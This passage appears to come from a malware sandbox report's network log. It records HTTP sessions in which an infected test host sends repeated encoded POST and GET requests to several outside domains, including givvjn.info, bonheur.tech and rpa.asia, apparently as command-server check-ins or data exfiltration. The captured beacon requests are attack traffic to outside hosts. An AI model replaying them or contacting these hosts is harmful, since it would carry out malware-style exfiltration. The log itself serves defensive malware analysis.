                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
65 | 192.168.11.30 | 49890 | 199.192.21.169 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 16:58:14.340969086 CET | 533 | OUT | GET /qps0/?6B-l7F=oe/Nf5ZxPavzyNCN5fJJ2OrxgayHc7sFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2iuVOPOn5EuQA8dSwoA=&80k=lRapCPMXgDk HTTP/1.1
    Host: www.bokus.site
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 16:58:14.524734020 CET | 933 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 09 Jan 2025 15:58:14 GMT
    Server: Apache
    Content-Length: 774
    Connection: close
    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
66 | 192.168.11.30 | 49891 | 47.83.1.90 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 16:58:28.098572969 CET | 796 | OUT | POST /nkmx/ HTTP/1.1
    Host: www.givvjn.info
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en
    Connection: close
    Cache-Control: no-cache
    Content-Length: 203
    Content-Type: application/x-www-form-urlencoded
    Origin: http://www.givvjn.info
    Referer: http://www.givvjn.info/nkmx/
    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 44 71 4f 73 54 55 66 46 65 6a 79 37 35 43 77 54 35 41 39 45 73 5a 7a 53 70 32 59 68 49 71 6b 70 43 55 75 4c 76 33 65 2b 7a 61 6b 72 30 39 67 4f 34 35 49 72 4e 62 6c 48 6b 78 66 31 75 77 56 61 73 4c 45 58 52 49 4b 66 42 64 76 4b 59 63 72 47 37 7a 49 39 6d 44 55 49 76 4f 30 71 48 74 4c 38 45 6b 43 5a 56 77 4c 76 4f 4c 4c 2b 67 4f 50 51 37 44 6f 30 33 34 31 2b 6f 53 31 7a 31 78 6d 4d 75 57 47 42 77 4b 78 58 48 72 42 41 44 6f 65 50 6f 39 57 38 58 75 38 52 71 4d 57 38 71 2b 6b 69 51 37 4e 45 4b 71 36 34 51 64 75 31 2b 36 56 72 6e 63 57 42 4e 41 3d 3d
                                                                                    Data Ascii: 6B-l7F=TW4HYQMdIKn0DqOsTUfFejy75CwT5A9EsZzSp2YhIqkpCUuLv3e+zakr09gO45IrNblHkxf1uwVasLEXRIKfBdvKYcrG7zI9mDUIvO0qHtL8EkCZVwLvOLL+gOPQ7Do0341+oS1z1xmMuWGBwKxXHrBADoePo9W8Xu8RqMW8q+kiQ7NEKq64Qdu1+6VrncWBNA==
Jan 9, 2025 16:58:29.108926058 CET | 137 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Thu, 09 Jan 2025 15:58:28 GMT
    Transfer-Encoding: chunked
    Connection: close
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
67 | 192.168.11.30 | 49892 | 47.83.1.90 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 16:58:30.949297905 CET | 816 | OUT | POST /nkmx/ HTTP/1.1
    Host: www.givvjn.info
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en
    Connection: close
    Cache-Control: no-cache
    Content-Length: 223
    Content-Type: application/x-www-form-urlencoded
    Origin: http://www.givvjn.info
    Referer: http://www.givvjn.info/nkmx/
    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 51 70 43 78 53 4c 75 31 32 2b 32 61 6b 72 38 64 67 50 6c 70 49 77 4e 62 59 6b 6b 31 58 31 75 77 78 61 73 4b 30 58 52 2f 2b 59 48 4e 76 49 55 38 72 45 2f 7a 49 39 6d 44 55 49 76 50 51 41 48 74 44 38 44 55 79 5a 58 53 7a 73 52 37 4c 68 6a 4f 50 51 74 7a 6f 77 33 34 31 63 6f 58 73 57 31 7a 4f 4d 75 54 69 42 78 59 4a 49 4f 72 42 4b 4d 49 66 4c 6b 34 7a 70 62 4e 77 6c 71 71 61 59 72 73 59 49 63 4d 67 65 58 70 4f 36 44 39 53 59 69 37 34 44 6c 65 58 61 51 45 59 46 46 41 4c 71 46 34 76 45 6d 7a 64 31 4c 4c 46 4e 32 68 55 3d
                                                                                    Data Ascii: 6B-l7F=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYQpCxSLu12+2akr8dgPlpIwNbYkk1X1uwxasK0XR/+YHNvIU8rE/zI9mDUIvPQAHtD8DUyZXSzsR7LhjOPQtzow341coXsW1zOMuTiBxYJIOrBKMIfLk4zpbNwlqqaYrsYIcMgeXpO6D9SYi74DleXaQEYFFALqF4vEmzd1LLFN2hU=
Jan 9, 2025 16:58:31.945035934 CET | 137 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Thu, 09 Jan 2025 15:58:31 GMT
    Transfer-Encoding: chunked
    Connection: close
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
68 | 192.168.11.30 | 49893 | 47.83.1.90 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 16:58:33.787697077 CET | 1289 | OUT | POST /nkmx/ HTTP/1.1
    Host: www.givvjn.info
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en
    Connection: close
    Cache-Control: no-cache
    Content-Length: 3339
    Content-Type: application/x-www-form-urlencoded
    Origin: http://www.givvjn.info
    Referer: http://www.givvjn.info/nkmx/
    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 49 70 43 44 4b 4c 76 55 32 2b 78 61 6b 72 39 64 67 53 6c 70 4a 79 4e 62 41 34 6b 31 54 4c 75 79 5a 61 6a 49 38 58 42 4f 2b 59 4f 4e 76 49 63 63 72 42 37 7a 49 6f 6d 44 45 4d 76 4f 67 41 48 74 44 38 44 58 71 5a 54 41 4c 73 4b 37 4c 2b 67 4f 50 6d 37 44 6f 59 33 38 67 72 6f 58 59 73 31 78 2b 4d 70 6b 4f 42 78 72 78 49 4f 72 42 4b 4c 49 66 77 6b 34 33 6f 62 4e 70 35 71 76 6a 76 6f 63 73 49 66 34 35 71 54 59 54 74 61 75 36 61 6d 49 73 35 7a 74 33 30 4e 47 68 6e 55 53 57 61 54 34 44 4c 75 44 4a 33 61 65 70 61 74 68 30 68 61 30 63 73 51 39 63 4e 42 62 35 74 4b 4f 69 5a 64 46 61 48 76 74 4a 78 67 42 48 4e 62 75 4e 64 65 6e 4e 47 47 4d 70 51 49 61 39 6a 4f 74 33 73 73 75 78 49 5a 63 38 51 67 62 68 53 63 31 66 72 31 56 53 63 45 59 74 56 47 74 46 59 34 42 45 76 4a 75 52 37 6c 33 44 74 4e 6a 48 37 72 63 2f 58 4e 7a 50 72 72 30 71 34 52 43 4a 42 48 68 42 66 64 34 79 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYIpCDKLvU2+xakr9dgSlpJyNbA4k1TLuyZajI8XBO+YONvIccrB7zIomDEMvOgAHtD8DXqZTALsK7L+gOPm7DoY38groXYs1x+MpkOBxrxIOrBKLIfwk43obNp5qvjvocsIf45qTYTtau6amIs5zt30NGhnUSWaT4DLuDJ3aepath0ha0csQ9cNBb5tKOiZdFaHvtJxgBHNbuNdenNGGMpQIa9jOt3ssuxIZc8QgbhSc1fr1VScEYtVGtFY4BEvJuR7l3DtNjH7rc/XNzPrr0q4RCJBHhBfd4yYvNOtjBTBdGsQtdgnMEL78hGmO563XCDuoJPI1ZWZHFZ3X+w2mGC2kbQsRPXaK7nA/z+QrK6gpC8u6PWPiaGfZj6PjNBWRV9J/N9uljrKOkpC/E1/2wNDCIbR9eBBvmQT2RpmyhZiHUeYs254QkMSMWQLO1NkXlOGTvFo2Wfn1KhXbnFJLGimT6MxlzdwwpcKKAJzZKZm0nrVkzz/C533VZQcL2uNUgwgHDOQqkWYjH0aZ0xljVTBrUwDCkimuuZhkgeVtPT007y//uzLpN2WZsP9bTBDN6ZQswmegC9iq/qqKpUFE4g8w5HGw3Rr/v/tYWf7yep2k9Sj4IDP4bRbDqwwBzDMGkOQYrLd
Jan 9, 2025 16:58:33.787744999 CET | 2578 | OUT | Data Raw: 6c 62 65 6d 2b 34 46 75 6d 4d 54 42 43 4d 37 51 44 52 63 45 74 55 63 44 53 6d 44 6d 76 31 75 43 73 30 47 34 37 37 54 6b 78 68 4d 4c 6b 64 6f 61 36 4a 42 37 32 4f 30 56 48 56 64 71 35 36 45 48 57 34 59 4a 5a 46 70 31 65 63 51 59 75 31 78 72 6d 65
                                                                                    Data Ascii: lbem+4FumMTBCM7QDRcEtUcDSmDmv1uCs0G477TkxhMLkdoa6JB72O0VHVdq56EHW4YJZFp1ecQYu1xrmeGNdI3VExexlLQBoX51Ui+gEdaqY3qPSurIEP8VE64VbvFoP2oAPgiZag2seiilWmTORTLbWYZsiDrLSGrlInU1aSmf4SIPu82+Va05mstIVATDVl2jBLJUT10qP8dU1br4Nm/GdJtI4i6+X0sNdCz17dRMDT5yOrX
Jan 9, 2025 16:58:33.787792921 CET | 66 | OUT | Data Raw: 58 61 2f 45 75 78 64 31 4a 6b 74 77 71 54 6d 74 56 34 74 53 73 45 6b 78 34 78 37 37 76 64 2b 56 4c 4e 65 6d 35 42 59 6d 66 54 46 59 33 6c 39 4a 49 61 79 42 6e 33 64 6e 6a 52 65 2b 53 45 43 67 3d 3d
    Data Ascii: Xa/Euxd1JktwqTmtV4tSsEkx4x77vd+VLNem5BYmfTFY3l9JIayBn3dnjRe+SECg==
Jan 9, 2025 16:58:34.814905882 CET | 137 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Thu, 09 Jan 2025 15:58:34 GMT
    Transfer-Encoding: chunked
    Connection: close
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
69 | 192.168.11.30 | 49894 | 47.83.1.90 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 16:58:36.623559952 CET | 534 | OUT | GET /nkmx/?6B-l7F=eUQnbnMYY/LCOqGDejL9TQzNqDkA9lUjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth/8fPOW7Uk3kTT+8ArA=&80k=lRapCPMXgDk HTTP/1.1
    Host: www.givvjn.info
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 16:58:37.649324894 CET | 139 | IN | HTTP/1.1 567 unknown
    Server: nginx/1.18.0
    Date: Thu, 09 Jan 2025 15:58:37 GMT
    Content-Length: 17
    Connection: close
    Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
    Data Ascii: Request too large


Session ID | Source IP | Source Port | Destination IP | Destination Port
70 | 192.168.11.30 | 49895 | 13.248.169.48 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 16:58:42.821834087 CET | 799 | OUT | POST /t3iv/ HTTP/1.1
    Host: www.bonheur.tech
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en
    Connection: close
    Cache-Control: no-cache
    Content-Length: 203
    Content-Type: application/x-www-form-urlencoded
    Origin: http://www.bonheur.tech
    Referer: http://www.bonheur.tech/t3iv/
    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 43 33 66 61 59 6b 55 63 35 72 38 55 32 2b 44 57 51 41 42 74 51 2b 53 4c 35 56 7a 64 57 41 53 43 33 4a 36 67 50 47 48 4d 75 41 41 33 4a 68 2b 58 4f 30 36 52 4d 36 32 71 56 51 4b 2b 74 54 51 38 52 33 62 38 4e 76 77 43 33 7a 51 64 34 51 55 38 73 54 2b 66 78 2f 33 6c 35 2f 42 55 30 6d 41 78 32 56 70 4e 33 52 67 72 74 57 7a 4e 6b 44 45 4a 44 46 4d 74 7a 64 6e 30 63 6f 67 68 6c 73 4b 6d 66 6a 35 6a 67 4a 4a 67 67 4f 73 54 6b 48 44 47 79 41 51 4c 54 6b 75 39 38 31 43 66 65 74 45 50 75 4b 71 6c 49 49 70 66 70 4e 78 79 73 34 32 2b 6b 6c 78 77 74 78 73 71 57 30 44 67 30 4e 2b 33 48 77 3d 3d
                                                                                    Data Ascii: 6B-l7F=C3faYkUc5r8U2+DWQABtQ+SL5VzdWASC3J6gPGHMuAA3Jh+XO06RM62qVQK+tTQ8R3b8NvwC3zQd4QU8sT+fx/3l5/BU0mAx2VpN3RgrtWzNkDEJDFMtzdn0coghlsKmfj5jgJJggOsTkHDGyAQLTku981CfetEPuKqlIIpfpNxys42+klxwtxsqW0Dg0N+3Hw==
Jan 9, 2025 16:58:42.958482027 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
    content-length: 0
    connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
71 | 192.168.11.30 | 49896 | 13.248.169.48 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 16:58:45.491806984 CET | 819 | OUT | POST /t3iv/ HTTP/1.1
    Host: www.bonheur.tech
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en
    Connection: close
    Cache-Control: no-cache
    Content-Length: 223
    Content-Type: application/x-www-form-urlencoded
    Origin: http://www.bonheur.tech
    Referer: http://www.bonheur.tech/t3iv/
    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 31 51 33 4a 46 36 58 63 42 61 52 4c 36 32 71 65 77 4b 37 69 7a 51 4e 52 33 58 72 4e 74 30 43 33 33 34 64 34 51 45 38 73 67 58 74 77 76 33 6e 67 50 42 53 37 47 41 78 32 56 70 4e 33 58 4e 4f 74 57 37 4e 6c 77 4d 4a 44 6b 4d 75 79 64 6e 31 66 6f 67 68 30 38 4b 69 66 6a 35 52 67 49 56 4f 67 4e 55 54 6b 47 7a 47 79 52 52 35 49 55 76 34 32 56 44 39 61 4f 35 41 6e 36 53 53 46 59 64 48 68 74 78 51 67 50 62 6b 35 6d 46 79 2b 52 51 48 4b 31 75 49 32 50 2f 73 61 2b 52 48 45 46 46 36 4d 46 59 6a 58 53 62 6b 4f 76 37 61 38 64 45 3d
                                                                                    Data Ascii: 6B-l7F=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct1Q3JF6XcBaRL62qewK7izQNR3XrNt0C334d4QE8sgXtwv3ngPBS7GAx2VpN3XNOtW7NlwMJDkMuydn1fogh08Kifj5RgIVOgNUTkGzGyRR5IUv42VD9aO5An6SSFYdHhtxQgPbk5mFy+RQHK1uI2P/sa+RHEFF6MFYjXSbkOv7a8dE=
Jan 9, 2025 16:58:45.627908945 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
    content-length: 0
    connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
72 | 192.168.11.30 | 49897 | 13.248.169.48 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 16:58:48.166132927 CET | 3936 | OUT | POST /t3iv/ HTTP/1.1
    Host: www.bonheur.tech
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en
    Connection: close
    Cache-Control: no-cache
    Content-Length: 3339
    Content-Type: application/x-www-form-urlencoded
    Origin: http://www.bonheur.tech
    Referer: http://www.bonheur.tech/t3iv/
    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 32 77 33 4b 77 75 58 4f 51 61 52 4b 36 32 71 43 67 4b 36 69 7a 51 51 52 33 50 6e 4e 74 35 33 33 78 38 64 2b 44 38 38 71 56 72 74 6c 2f 33 6e 6f 76 42 58 30 6d 41 6b 32 56 35 4a 33 58 39 4f 74 57 37 4e 6c 78 63 4a 58 6c 4d 75 2f 39 6e 30 63 6f 67 39 6c 73 4c 46 66 6a 77 6d 67 49 42 77 67 4f 6b 54 6b 78 2f 47 7a 6a 35 35 49 55 76 34 73 6c 44 34 61 4f 31 64 6e 36 4b 2f 46 5a 56 58 6d 65 39 51 7a 37 4c 37 6d 46 78 30 6c 33 51 49 4a 30 32 2f 36 4e 33 45 45 4d 68 4b 46 6d 70 63 4b 33 51 66 54 7a 37 59 61 66 62 6a 6a 61 7a 7a 34 61 36 59 68 5a 2f 50 52 6c 33 70 35 70 34 51 65 59 36 34 31 76 32 5a 62 66 79 64 4a 31 64 66 32 72 73 69 46 63 58 42 6e 77 37 72 54 34 69 52 67 6b 77 71 42 57 38 45 73 77 4b 6f 6c 4d 6f 55 33 2f 6f 58 54 51 64 49 4f 61 68 4f 4c 52 45 2f 5a 58 5a 6d 69 6e 46 4c 30 73 50 54 6f 53 4f 33 44 65 42 75 73 4b 49 66 6a 48 71 30 74 5a 34 68 4a 45 61 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F= [TRUNCATED]
                                                                                    Timestamp: Jan 9, 2025 16:58:48.303730965 CET  Bytes transferred: 73  Direction: IN
                                                                                    HTTP/1.1 405 Method Not Allowed
                                                                                    content-length: 0
                                                                                    connection: close


                                                                                    Session ID: 73  Source IP: 192.168.11.30  Source Port: 49898  Destination IP: 13.248.169.48  Destination Port: 80
                                                                                    Timestamp: Jan 9, 2025 16:58:50.847191095 CET  Bytes transferred: 535  Direction: OUT
                                                                                    GET /t3iv/?80k=lRapCPMXgDk&6B-l7F=P136bSYw/boin6uqIxZ+PLa4sXTYWAHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2CMMqknG4ydwL3V23OA= HTTP/1.1
                                                                                    Host: www.bonheur.tech
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Timestamp: Jan 9, 2025 16:58:50.986644030 CET  Bytes transferred: 379  Direction: IN
                                                                                    HTTP/1.1 200 OK
                                                                                    content-type: text/html
                                                                                    date: Thu, 09 Jan 2025 15:58:50 GMT
                                                                                    content-length: 258
                                                                                    connection: close
                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?80k=lRapCPMXgDk&6B-l7F=P136bSYw/boin6uqIxZ+PLa4sXTYWAHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2CMMqknG4ydwL3V23OA="}</script></head></html>


                                                                                    Session ID: 74  Source IP: 192.168.11.30  Source Port: 49899  Destination IP: 160.25.166.123  Destination Port: 80
                                                                                    Timestamp: Jan 9, 2025 16:58:56.367445946 CET  Bytes transferred: 787  Direction: OUT
                                                                                    POST /bwjl/ HTTP/1.1
                                                                                    Host: www.rpa.asia
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.rpa.asia
                                                                                    Referer: http://www.rpa.asia/bwjl/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Ascii: 6B-l7F=On/0Uk0gKlcgxz9muO5dHP1vRn5C8VDqjPeKBXnf8PJx+4/uhizA5b56RFWMnqR7kil24MJS2cxM0UDN2gtfjhtWVo5JaHPZc1KzowxNAFsSLMH3ZQXxhJTQIRHr/07jB9rh1l6RgpfCk/EumfrzurH06GJkH09DXubk6XJeGV+BruJAgGK0Cbco4Wv7Jca1zA==
                                                                                    Timestamp: Jan 9, 2025 16:58:56.719484091 CET  Bytes transferred: 1289  Direction: IN
                                                                                    HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Thu, 09 Jan 2025 15:58:56 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                    Timestamp: Jan 9, 2025 16:58:56.719491959 CET  Bytes transferred: 200  Direction: IN
                                                                                    Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session ID: 75  Source IP: 192.168.11.30  Source Port: 49900  Destination IP: 160.25.166.123  Destination Port: 80
                                                                                    Timestamp: Jan 9, 2025 16:58:59.261226892 CET  Bytes transferred: 807  Direction: OUT
                                                                                    POST /bwjl/ HTTP/1.1
